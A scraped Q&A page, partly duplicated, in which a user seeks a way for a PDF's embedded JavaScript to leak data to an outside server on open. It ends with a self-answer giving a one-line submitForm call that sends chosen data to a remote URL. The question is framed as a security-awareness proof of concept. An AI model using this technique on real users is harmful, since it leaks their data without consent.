Send GET requests from a PDF file










-1















I'm currently working on a security Proof Of Concept where I need to show the danger of opening unknown PDF file.

Internet says that many malware use Javascript in PDF document (AcroJS) to download their malicious payload.



My PoC is based on a victim who will demonstrate data leak based on opening a PDF file. I only needs to send the filename over Internet. I can write Javascript code which launch at document opening but the Net.HTTP.request function can only be used in trusted context.

So I don't see how to make a GET request to my listening "evil" website.

I read that sometimes hackers use vulnerabilities in Acrobat to do their bad, but many places talk about the native ability of AcroJS to permit GET request.



Is anyone knowing how to do a one way GET request (the answer of the server is not even interesting in this case).



Maybe is there a way to include a remote (non existent) picture so the PDF will make a GET request to the specified URL.

Or something like this.



Thanks for your help, I know this is really close to security concerns, but I think the answer needs acroJS skills (which are rare in security community).



Thanks










share|improve this question

















  • 1





    Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.

    – joelgeraci
    Nov 15 '18 at 0:05











  • Okay, open a link in the browser in perfect for me, how to do that ?

    – Sibwara
    Nov 15 '18 at 8:42











  • And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)

    – Sibwara
    Nov 15 '18 at 9:14















-1















I'm currently working on a security Proof Of Concept where I need to show the danger of opening unknown PDF file.

Internet says that many malware use Javascript in PDF document (AcroJS) to download their malicious payload.



My PoC is based on a victim who will demonstrate data leak based on opening a PDF file. I only needs to send the filename over Internet. I can write Javascript code which launch at document opening but the Net.HTTP.request function can only be used in trusted context.

So I don't see how to make a GET request to my listening "evil" website.

I read that sometimes hackers use vulnerabilities in Acrobat to do their bad, but many places talk about the native ability of AcroJS to permit GET request.



Is anyone knowing how to do a one way GET request (the answer of the server is not even interesting in this case).



Maybe is there a way to include a remote (non existent) picture so the PDF will make a GET request to the specified URL.

Or something like this.



Thanks for your help, I know this is really close to security concerns, but I think the answer needs acroJS skills (which are rare in security community).



Thanks










share|improve this question

















  • 1





    Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.

    – joelgeraci
    Nov 15 '18 at 0:05











  • Okay, open a link in the browser in perfect for me, how to do that ?

    – Sibwara
    Nov 15 '18 at 8:42











  • And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)

    – Sibwara
    Nov 15 '18 at 9:14













-1












-1








-1








I'm currently working on a security Proof Of Concept where I need to show the danger of opening unknown PDF file.

Internet says that many malware use Javascript in PDF document (AcroJS) to download their malicious payload.



My PoC is based on a victim who will demonstrate data leak based on opening a PDF file. I only needs to send the filename over Internet. I can write Javascript code which launch at document opening but the Net.HTTP.request function can only be used in trusted context.

So I don't see how to make a GET request to my listening "evil" website.

I read that sometimes hackers use vulnerabilities in Acrobat to do their bad, but many places talk about the native ability of AcroJS to permit GET request.



Is anyone knowing how to do a one way GET request (the answer of the server is not even interesting in this case).



Maybe is there a way to include a remote (non existent) picture so the PDF will make a GET request to the specified URL.

Or something like this.



Thanks for your help, I know this is really close to security concerns, but I think the answer needs acroJS skills (which are rare in security community).



Thanks










share|improve this question














I'm currently working on a security Proof Of Concept where I need to show the danger of opening unknown PDF file.

Internet says that many malware use Javascript in PDF document (AcroJS) to download their malicious payload.



My PoC is based on a victim who will demonstrate data leak based on opening a PDF file. I only needs to send the filename over Internet. I can write Javascript code which launch at document opening but the Net.HTTP.request function can only be used in trusted context.

So I don't see how to make a GET request to my listening "evil" website.

I read that sometimes hackers use vulnerabilities in Acrobat to do their bad, but many places talk about the native ability of AcroJS to permit GET request.



Is anyone knowing how to do a one way GET request (the answer of the server is not even interesting in this case).



Maybe is there a way to include a remote (non existent) picture so the PDF will make a GET request to the specified URL.

Or something like this.



Thanks for your help, I know this is really close to security concerns, but I think the answer needs acroJS skills (which are rare in security community).



Thanks







javascript pdf acrobat






share|improve this question













share|improve this question











share|improve this question




share|improve this question










asked Nov 14 '18 at 23:29









SibwaraSibwara

11




11







  • 1





    Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.

    – joelgeraci
    Nov 15 '18 at 0:05











  • Okay, open a link in the browser in perfect for me, how to do that ?

    – Sibwara
    Nov 15 '18 at 8:42











  • And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)

    – Sibwara
    Nov 15 '18 at 9:14












  • 1





    Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.

    – joelgeraci
    Nov 15 '18 at 0:05











  • Okay, open a link in the browser in perfect for me, how to do that ?

    – Sibwara
    Nov 15 '18 at 8:42











  • And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)

    – Sibwara
    Nov 15 '18 at 9:14







1




1





Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.

– joelgeraci
Nov 15 '18 at 0:05





Using AcroJS and Acrobat or Reader version 10.1 and higher, you can't execute a blind (without user interaction) GET unless the document is in some trusted state or the site is considered trusted. The closest you'll be able to come is to execute a link which will open in the browser but then the security problem is for the browser to handle.

– joelgeraci
Nov 15 '18 at 0:05













Okay, open a link in the browser in perfect for me, how to do that ?

– Sibwara
Nov 15 '18 at 8:42





Okay, open a link in the browser in perfect for me, how to do that ?

– Sibwara
Nov 15 '18 at 8:42













And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)

– Sibwara
Nov 15 '18 at 9:14





And how to execute a GET with the user interaction (it could be interresting to test awareness on this point, like for macro in word)

– Sibwara
Nov 15 '18 at 9:14












1 Answer
1






active

oldest

votes


















0














Okay I find a way by using :



this.submitForm("http://mydomain.fr/var="+thedataIwant);


The user is prompted about a HTTP connection tentative but this is the vigilance I want to test for.

The articles of this guy help me a lot: https://acrobatusers.com/tutorials/author/parker






share|improve this answer






















    Your Answer






    StackExchange.ifUsing("editor", function ()
    StackExchange.using("externalEditor", function ()
    StackExchange.using("snippets", function ()
    StackExchange.snippets.init();
    );
    );
    , "code-snippets");

    StackExchange.ready(function()
    var channelOptions =
    tags: "".split(" "),
    id: "1"
    ;
    initTagRenderer("".split(" "), "".split(" "), channelOptions);

    StackExchange.using("externalEditor", function()
    // Have to fire editor after snippets, if snippets enabled
    if (StackExchange.settings.snippets.snippetsEnabled)
    StackExchange.using("snippets", function()
    createEditor();
    );

    else
    createEditor();

    );

    function createEditor()
    StackExchange.prepareEditor(
    heartbeatType: 'answer',
    autoActivateHeartbeat: false,
    convertImagesToLinks: true,
    noModals: true,
    showLowRepImageUploadWarning: true,
    reputationToPostImages: 10,
    bindNavPrevention: true,
    postfix: "",
    imageUploader:
    brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
    contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
    allowUrls: true
    ,
    onDemand: true,
    discardSelector: ".discard-answer"
    ,immediatelyShowMarkdownHelp:true
    );



    );













    draft saved

    draft discarded


















    StackExchange.ready(
    function ()
    StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53310315%2fsend-get-requests-from-a-pdf-file%23new-answer', 'question_page');

    );

    Post as a guest















    Required, but never shown

























    1 Answer
    1






    active

    oldest

    votes








    1 Answer
    1






    active

    oldest

    votes









    active

    oldest

    votes






    active

    oldest

    votes









    0














    Okay I find a way by using :



    this.submitForm("http://mydomain.fr/var="+thedataIwant);


    The user is prompted about a HTTP connection tentative but this is the vigilance I want to test for.

    The articles of this guy help me a lot: https://acrobatusers.com/tutorials/author/parker






    share|improve this answer



























      0














      Okay I find a way by using :



      this.submitForm("http://mydomain.fr/var="+thedataIwant);


      The user is prompted about a HTTP connection tentative but this is the vigilance I want to test for.

      The articles of this guy help me a lot: https://acrobatusers.com/tutorials/author/parker






      share|improve this answer

























        0












        0








        0







        Okay I find a way by using :



        this.submitForm("http://mydomain.fr/var="+thedataIwant);


        The user is prompted about a HTTP connection tentative but this is the vigilance I want to test for.

        The articles of this guy help me a lot: https://acrobatusers.com/tutorials/author/parker






        share|improve this answer













        Okay I find a way by using :



        this.submitForm("http://mydomain.fr/var="+thedataIwant);


        The user is prompted about a HTTP connection tentative but this is the vigilance I want to test for.

        The articles of this guy help me a lot: https://acrobatusers.com/tutorials/author/parker







        share|improve this answer












        share|improve this answer



        share|improve this answer










        answered Nov 15 '18 at 17:18









        SibwaraSibwara

        11




        11





























            draft saved

            draft discarded
















































            Thanks for contributing an answer to Stack Overflow!


            • Please be sure to answer the question. Provide details and share your research!

            But avoid


            • Asking for help, clarification, or responding to other answers.

            • Making statements based on opinion; back them up with references or personal experience.

            To learn more, see our tips on writing great answers.




            draft saved


            draft discarded














            StackExchange.ready(
            function ()
            StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53310315%2fsend-get-requests-from-a-pdf-file%23new-answer', 'question_page');

            );

            Post as a guest















            Required, but never shown





















































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown

































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown







            Popular posts from this blog

            Use pre created SQLite database for Android project in kotlin

            Darth Vader #20

            Ondo